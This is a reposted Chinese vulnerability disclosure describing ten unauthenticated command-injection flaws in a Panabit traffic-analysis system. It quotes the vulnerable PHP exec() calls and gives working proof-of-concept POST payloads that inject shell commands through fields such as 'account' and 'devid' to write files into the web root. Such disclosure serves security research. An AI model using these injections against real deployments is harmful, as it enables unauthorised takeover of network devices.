神刀安全网

漏洞标题: Panabit某流量分析管理系统十处命令执行(无需登录)

漏洞详情

披露状态:

2016-03-11: 细节已通知厂商并且等待厂商处理中
2016-03-15: 厂商已经确认,细节仅向厂商公开
2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-09: 细节向核心白帽子及相关领域专家公开
2016-05-19: 细节向普通白帽子公开
2016-05-29: 细节向实习白帽子公开
2016-06-13: 细节向公众公开

简要描述:

Panabit某流量分析管理系统十处命令执行(无需登录)

详细说明:

全部打包了只求全rank哇

官网案例:http://**.**.**.**/html/solution/success_case/2014/0903/82.html 可以看到此厂商面对的客户都是一些运营商 高校 企业 小区 网吧用户规模是非常大

第一 二 三 四处:根目录下的fetionlist.php qqlist.php sinawblist.php taobaolist.php

code 区域
..... 关键代码
$devid = $_POST['devid'];
$ipaddr = $_POST['ipaddr'];
$qqnumber = $_POST['qqnumber'];
$strstart = $_POST['starttime'];
$strend = $_POST['endtime'];
$topn = $_POST['topn'];
$account = $_POST['account'];
$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];
$bexport = $_POST['bexport'];
$eventtype = $_POST['eventtype'];

if ($bexport == 1)
$filename = date("YmdHis").".xls";
else if ($bexport == 2)
$filename = date("YmdHis").".txt";
else if ($bexport == 3)
$filename = date("YmdHis").".csv";
else $filename = "none";

$longstart = strtotime($strstart);
$longend = strtotime($strend);

if ($ipaddr == "") $ipaddr = "none";
else $ipaddr = ip2long($ipaddr);
if ($qqnumber == "") $qqnumber = "none";
if ($account == "") $account = "none";

$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts) - 24*3600;
$elong = $longend;
$tablestr = $slong."/".$elong;

$k = 0;
$result = array();
$res = array();
$link = $filename;

$tablefile = php_getfetiontable($strstart, $strend);

$cmd = LOGDPATH."/bin/logeye fetionlist $devid $ipaddr $qqnumber $account $longstart $longend $tablefile $bexport $filename $errfile $topn $eventtype";
exec($cmd, $output, $return);

这四处关键部分大概内容都差不多 四处变量$devid $ipaddr $qqnumber $account无防护传给$cmd, $cmd直接进入exec()函数导致命令执行

第五 六处:/Maintain/createappgraph.php

/Maintain/createipgraph.php

code 区域
$devid = $_POST['devid'];
$strstart = $_POST['tmstart'];
$strend = $_POST['tmend'];
$topapp = $_POST['topapp'];
$linkid = $_POST['linkid'];
$appname = $_POST['appname'];

$conn = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);
mysql_query("set names 'utf8'");
$result = mysql_query("select name from palog.axp where cname = '$appname'");
if (mysql_num_rows($result) != 0)
{
$row = mysql_fetch_row($result);
$appname = $row[0];
}
mysql_close();

$longstart = strtotime($strstart);
$longend = strtotime($strend);

$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts)-30*60;
$elong = $longend;
$tables = $slong."/".$elong;

function formatdata($values, $u)
{
if ($values > 1024*1024*1024){
$units = 'G';
$div = 1024*1024*1024;
}
else if ($values > 1024*1024){
$units = 'M';
$div = 1024*1024;
}
else if ($values > 1024){
$units = 'K';
$div = 1024;
}else {
$units = 'B';
$div = 1;
}
if ($u == 'units') return $units;
else return $div;
}

$labels = array();
$values = array();
$chart = new VerticalBarChart(1100, 300);
$dataSet = new XYDataSet();

exec(DOCROOT."//bin//logeye.exe apptop $devid $longstart $longend $tables $topapp appup $linkid", $output, $return);

Maintain此为后台目录但是没有验证权限导致未授权访问

这两处关键部分大概内容都差不多

三处变量$devid $linkid $topapp未过滤进入exec()函数导致命令执行

第七 八处/Maintain/exportpdf.php

/Maintain/exportpdf_cgi.php

code 区域
$devid = $_POST['devid'];
$ip = $_POST['ip'];
$strstart = $_POST['tmstart'];
$strend = $_POST['tmend'];
$top = $_POST['top'];
$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];

if ($ip == "")
$ip = "**.**.**.**-**.**.**.**";

$longstart = strtotime($strstart);
$longend = strtotime($strend);

$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts)-6*30*60;
$elong = $longend;
$tables = $slong."/".$elong;

$pdf=new PDF('P', 'mm', 'A4');

$pdf->Open();
$pdf->SetMargins(5, 5, 5);
$pdf->AddPage();
$pdf->SetDisplayMode('real');
$pdf->AddGBFont();

$pdf->SetFont('GB', 'B', 25);
$pdf->SetXY(57, 70);
$pdf->Cell(40,10, '流控日志管理系统报表');
$pdf->Ln();
$pdf->SetX(80);
$pdf->Cell(40,10,'('.date('Y/m/d').')');
$pdf->Ln();
$pdf->Image($doc.'/img/logo.jpg', 75, 90, 50, 15);

$pdf->SetFont('GB', '', 14);
$pdf->Ln(50);

$pdf->SetX(60);
$pdf->Cell(40, 10, '创建用户:');
$pdf->Cell(40, 10, $_COOKIE['c_username']);
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '流控设备编号:');
if ($devid == 0)
$pdf->Cell(40, 10, "所有设备");
else $pdf->Cell(40,10, $devid);
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '统计时间段:');
$pdf->Cell(40, 10, date('Y/m/d H:i', $longstart).'-'.date('Y/m/d H:i', $longend));
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '报表生成时间:');
$pdf->Cell(40, 10, date('Y/m/d H:i'), 0,1,'L',false);

$dwidth = array(10, 28, 18, 18, 18, 18, 18, 18, 18, 18, 18);
$arcolors = array("#068BC5","#4EB133","#E6561C","#E6EB01","#24C8E3","#62E172","#F7EE64","#69F5C3","#ACDBFD","#C6C9CA", "#F68F67","#CDE577","#710000","#5D584B","#4572A7");

$pdf->AddPage();


$tablefile = php_getiptable($strstart, $strend, $devid);

exec(LOGDPATH."/bin/logeye iptop $devid $ip $longstart $longend $tablefile $top total $errfile", $output, $return);

$xlabels = array();
$yvalues = array();
foreach($output as $key=>$val){
$ds = explode(' ', $val);
if ($ds[0] == "**.**.**.**") continue;

array_push($xlabels, $ds[0]);
array_push($yvalues, (double)$ds[1] / 1000 / 1000);
}

if (count($yvalues) != 0) {
$graph = new Graph(1000,300,'auto');
$graph->SetScale("textlin");
$graph->img->SetMargin(50,50,10,100);
$graph->title->SetFont(FF_SIMSUN, FS_NORMAL);
$graph->xaxis->SetFont(FF_SIMSUN, FS_NORMAL);
$graph->title->Set("(单位:M)");
$graph->ygrid->SetFill(false);
$graph->xaxis->SetLabelAngle(50);
$graph->xaxis->SetTickLabels($xlabels);
$graph->yaxis->HideLine(false);
$graph->yaxis->HideTicks(false,false);
$bplot = new BarPlot($yvalues);
$bplot->SetFillColor($arcolors);
$graph->Add($bplot);
$graph->Stroke($doc."/download/iptotal.png");

$pdf->SetFont('GB', 'B', 14);
$pdf->Cell(40, 10, '用户统计');
$pdf->Ln();
$pdf->Ln();
$pdf->Image($doc.'/download/iptotal.png', $pdf->GetX(), $pdf->GetY(), 200, 80);
//unlink($doc.'/download/iptotal.png');
$pdf->Ln();
$pdf->SetY(110);

$pdf->SetFillColor(58,110,165);
$pdf->SetTextColor(255, 255,255);
$pdf->SetFont('GB', 'B', 10);

$pdf->Cell(10, 14, "序号", 1, 0, 'C', true);
$pdf->Cell(28, 14, "用户", 1, 0, 'C', true);
$pdf->Cell(54, 7, "流量(字节)", 1, 2, 'C', true);
$pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
$pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
$pdf->Cell(18, 7, "总", 1, 0, 'C', true);
$pdf->SetXY($pdf->GetX(), $pdf->GetY()-7);
$pdf->Cell(54, 7, "平均速率(bps)", 1, 2, 'C', true);
$pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
$pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
$pdf->Cell(18, 7, "总", 1, 0, 'C', true);
$pdf->SetXY($pdf->GetX(), $pdf->GetY()-7);
$pdf->Cell(54, 7, "峰值速率(bps)", 1, 2, 'C', true);
$pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
$pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
$pdf->Cell(18, 7, "总", 1, 0, 'C', true);
$pdf->Ln();
$pdf->SetTextColor(0, 0,0);
foreach($output as $key=>$val){
$ds = explode(' ', $val);
if ($ds[0] == "**.**.**.**") continue;

$pdf->Cell($dwidth[0], 7, $key+1, 1, 0, 'C');
$pdf->Cell($dwidth[1], 7, $ds[0], 1, 0, 'C');
$pdf->Cell($dwidth[2], 7, dataformat((double)$ds[2]), 1, 0, 'C');
$pdf->Cell($dwidth[3], 7, dataformat((double)$ds[3]), 1, 0, 'C');
$pdf->Cell($dwidth[4], 7, dataformat((double)$ds[1]), 1, 0, 'C');
$pdf->Cell($dwidth[5], 7, dataformat((double)$ds[2]*8/$ds[8]), 1, 0, 'C');
$pdf->Cell($dwidth[6], 7, dataformat((double)$ds[3]*8/$ds[8]), 1, 0, 'C');
$pdf->Cell($dwidth[7], 7, dataformat((double)$ds[1]*8/$ds[8]), 1, 0, 'C');
$pdf->Cell($dwidth[8], 7, dataformat((double)$ds[6]*8/$ds[9]), 1, 0, 'C');
$pdf->Cell($dwidth[9], 7, dataformat((double)$ds[7]*8/$ds[9]), 1, 0, 'C');
$pdf->Cell($dwidth[10], 7, dataformat(((double)$ds[6]+(double)$ds[7])*8/$ds[9]), 1, 0, 'C');
$pdf->Ln();
}

$pdf->AddPage();

unset($output);
unset($xlabels);
unset($yvalues);
}
else {
outputres("no", "noip");
exit;
}

$tablefile = php_getapptable($strstart, $strend);

exec(LOGDPATH."/bin/logeye apptop $devid $longstart $longend $tablefile $top total 0 $errfile", $output, $return);

这两处关键部分大概内容都差不多

变量$devid $top未过滤进入exec()函数导致命令执行

第九处:/Maintain/ifadmin.php

code 区域
<?php
$doc = $_SERVER['DOCUMENT_ROOT'];
include("$doc/common.php");

$ifadmin = $_POST['ifadmin'];
$ipaddr = $_POST['ipaddr'];
$netmask = $_POST['netmask'];
$gateway = $_POST['gateway'];

$confl = array();
$confl = file("/etc/rc.conf");
foreach($confl as $val){
if (strstr($val, "ifconfig") !== false){
$ds = explode('=', $val);
$ifconfig = $ds[0];
$ipstr = $ds[1];

$ds1 = explode('_', $ifconfig);
$ori_ifadmin = $ds1[1];

$ds2 = explode(' ', $ipstr);
$ori_ipaddr = $ds2[1];
$ori_netmask = trim($ds2[3], "/"/n/r");
}
if (strstr($val, "defaultrouter") !== false){
$ds = explode('=', $val);
$ori_gateway = trim($ds[1], "/"/n/r");
}
}

if ($ipaddr == $ori_ipaddr && $netmask == $ori_netmask && $gateway == $ori_gateway)
outputres("yes", "操作成功");
else{
$confl = array();
$confl = file("/etc/rc.conf");

$fp = fopen("/etc/rc.conf", "w");
foreach($confl as $val){
if (strstr($val, "ifconfig") !== false){
fwrite($fp, "ifconfig_$ifadmin=/"inet $ipaddr netmask $netmask/"/n");
continue;
}
if (strstr($val, "defaultrouter") !== false){
fwrite($fp, "defaultrouter=/"$gateway/"/n");
continue;
}
fwrite($fp, $val);
}
fclose($fp);
exec("ifconfig $ifadmin $ipaddr netmask $netmask");
exec("route add default $gateway");
outputres("yes", "操作成功");
}
?>

变量$ifadmin $ipaddr netmask $netmask 未过滤导致命令执行

第十处:/Maintain/zpool_set.php

code 区域
if (!file_exists("/usr/logd/bin/install_device")){
outputres("no", "对不起,此功能在最新ISO安装的系统上有效");
exit(0);
}

if ($type == "add"){
$add = $_POST['add'];

exec("df -h | grep mylog", $output, $ret);
if ($ret == 1){
outputres("no", "zpool mylog is not exists!");
exit(0);
}

exec("zpool add -f mylog $add", $output, $ret);
if ($ret == 1){
outputres("no", $output[0]);
exit(0);
}

outputres("yes", "");
}

if ($type == "replace"){
$repla = $_POST['repla'];
$new_repla = $_POST['new_repla'];

exec("df -h | grep mylog", $output, $ret);
if ($ret == 1){
outputres("no", "zpool mylog is not exists!");
exit(0);
}

exec("zpool replace -f mylog $repla $new_repla", $output, $ret);
if ($ret == 1){
outputres("no", $output[0]);
exit(0);
}

outputres("yes", "");
}

变量$add $repla未过滤导致命令执行

漏洞证明:

这么多处,随便拿两处来说吧

第四处证明拿一处来说

**.**.**.**/qqlist.php

postdata:

devid=1&ipaddr=**.**.**.**&account=xx;echo 1111>/usr/logd/www/1111.php

执行完会在根目录生成一个1111.php的文件

漏洞标题:  Panabit某流量分析管理系统十处命令执行(无需登录)

第二处后台证明:**.**.**.**/Maintain/exportpdf.php

postdata:devid=11;echo xxxxxxx>/usr/logd/www/223.php

漏洞标题:  Panabit某流量分析管理系统十处命令执行(无需登录)

后台其它文件也是同理会执行成功

修复方案:

交给厂商

版权声明:转载请注明来源 komas@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: Panabit某流量分析管理系统十处命令执行(无需登录)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址